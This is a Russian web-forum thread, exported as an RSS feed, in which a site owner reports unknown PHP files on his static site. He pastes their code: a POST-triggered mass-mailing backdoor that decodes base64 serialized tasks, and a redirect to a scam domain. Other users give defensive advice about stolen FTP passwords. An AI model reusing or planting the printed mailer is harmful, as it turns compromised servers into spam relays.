Неизвестные php файлы нашел в корневой папке - Visavi.net https://visavi.net/ RSS - Visavi.net https://visavi.net/assets/img/images/logo_small.png RSS - Visavi.net https://visavi.net/ [email protected] (admin) [email protected] (admin) Thu, 26 Dec 2024 16:09:16 +0300 В любом FTP клиенте и IDE хранить пароли НЕЛЬЗЯ!<br> <br> KeepaSS! И только https://visavi.net/topics/38857/645387 Неизвестные php файлы нашел в корневой папке Станислав Крунич Tue, 03 Sep 2013 20:38:56 +0400 Сообщения https://visavi.net/topics/38857/645387 #6 однозначно! https://visavi.net/topics/38857/645380 Неизвестные php файлы нашел в корневой папке Кевин Митник Tue, 03 Sep 2013 20:30:22 +0400 Сообщения https://visavi.net/topics/38857/645380 <a href="http://filezilla.ru/get/" target="_blank" rel="nofollow">Filezilla FTP Client</a> https://visavi.net/topics/38857/645366 Неизвестные php файлы нашел в корневой папке Zдешний Tue, 03 Sep 2013 19:24:54 +0400 Сообщения https://visavi.net/topics/38857/645366 Я 6 лет так хранил и было ок. Сейчас тотал командер у меня. Какой посоветуете? https://visavi.net/topics/38857/645362 Неизвестные php файлы нашел в корневой папке ШЕДЕВР Tue, 03 Sep 2013 19:18:24 +0400 Сообщения https://visavi.net/topics/38857/645362 Не хрен хранить пароли FTP на менеджерах и вообще на компе в открытом виде. Меняй все пароли, ставь другой FTP менеджер. Проверяй комп на вирусы, например доктор вебом. https://visavi.net/topics/38857/645359 Неизвестные php файлы нашел в корневой папке Neformat Tue, 03 Sep 2013 18:56:40 +0400 Сообщения https://visavi.net/topics/38857/645359 кстати. заметил что такое на ВСЕХ сайтах моих. и не важно в каких это хостингах. может на компе вирус и он подбирал пароли через тотал командер<br> <br> 2, проверяю. каждый день. у меня касперский активен с лицензией. он даже не пикнул. https://visavi.net/topics/38857/645357 Неизвестные php файлы нашел в корневой папке ШЕДЕВР Tue, 03 Sep 2013 18:25:58 +0400 Сообщения https://visavi.net/topics/38857/645357 комп на вирусы проверь. была подобная ситуация.только в каждый индекс добавлялся код. https://visavi.net/topics/38857/645356 Неизвестные php файлы нашел в корневой папке николай Tue, 03 Sep 2013 18:20:49 +0400 Сообщения https://visavi.net/topics/38857/645356 Имеется простой статичный сайт из 1 страницы HTML. Никаких входящих данных. Это просто статичная страница. Недавно зашел залить внутрь сервера пару файлов. Заметил 5 файлов, неизвестного происхождения:<br> <br> ddubvmr.php<br> hqdlahg.php<br> shemubb.php<br> yhfrhqn.php<br> yxbmjpw.php<br> <br> Контент в них одинаковый. Либо в одном из них данный код:<br> <br> <pre class="prettyprint"> &lt;?php if (isset($_POST&#91;&#039;task&#039;])) { error_reporting(E_ALL); ini_set(&#039;display_errors&#039;, TRUE); ini_set(&#039;memory_limit&#039;, &#039;512M&#039;); set_time_limit(0); ini_set(&#039;max_execution_time&#039;,0); ini_set(&#039;set_time_limit&#039;,0); $x = unserialize(base64_decode($_POST&#91;&#039;task&#039;])); if ($x==false) {exit();} $send_from = base64_encode(&#039;http&#58;//&#039;.$_SERVER&#91;&#039;HTTP_HOST&#039;].$_SERVER&#91;&#039;REQUEST_URI&#039;]); foreach ($x as $arr) { echo $arr&#91;&#039;to&#039;].&quot;\r\n&quot;; $arr&#91;&#039;msg&#039;] = str_replace(&#039;&#91;send_from_url]&#039;,$send_from,$arr&#91;&#039;msg&#039;]); mail($arr&#91;&#039;to&#039;],$arr&#91;&#039;subj&#039;],$arr&#91;&#039;msg&#039;],&quot;MIME-Version&#58; 1.0\r\nContent-type&#58; text/html; charset=windows-1251\r\n&quot;); } exit(&#039;SEND OK&#039;); } </pre> <br> Либо этот локатор:<br> <pre class="prettyprint"> &lt;?php header(&#039;Location&#58; http&#58;//moneevdi.ru/&#039;); ?&gt; </pre> <br> Не понятно ЧТО ЭТО и ОТКУДА ЭТО.<br> <br> Хостер ничего не знает. Видимо чтобы отделаться сказал, что НА САЙТЕ &quot;ДЫРКА&quot;... Но блин сайт статичный из 1-го файла.<br> <br> Что думаете, может кто либо сталкивался с этим?<br> <br> <em><span style="font-size:x-small">Добавлено через 02:28 сек.</span></em><br> Как я понял это какой-то вирус, который использует сайт для отправки спама?<br> <br> <em><span style="font-size:x-small">Добавлено через 03:24 сек.</span></em><br> Перейдя по сайту header(&#039;Location: <a href="http://moneevdi.ru/&#039;" target="_blank" rel="nofollow">http://moneevdi.ru/&#039;</a>); понял что это какой то развод, сайт-обманка... но как их файлы проникли в мой сервер?<br> <br> <em><span style="font-size:x-small">Добавлено через 05:51 сек.</span></em><br> В итоге вышел на сайт <a href="http://www.utrader.com/OpenAccount/?campaign=726" target="_blank" rel="nofollow">http://www.utrader.com/OpenAccount/?campaign=726</a> .... видимо это просто реферал для получения %... но как найти ту &quot;дыру&quot; по которой забросили этот файл.<br> <br> могли ли весь хостинг взломать? то есть не через мой сайт, а через соседний, после чего закинули такой файл всем тем у кого есть активные сайты https://visavi.net/topics/38857/645355 Неизвестные php файлы нашел в корневой папке ШЕДЕВР Tue, 03 Sep 2013 18:04:18 +0400 Сообщения https://visavi.net/topics/38857/645355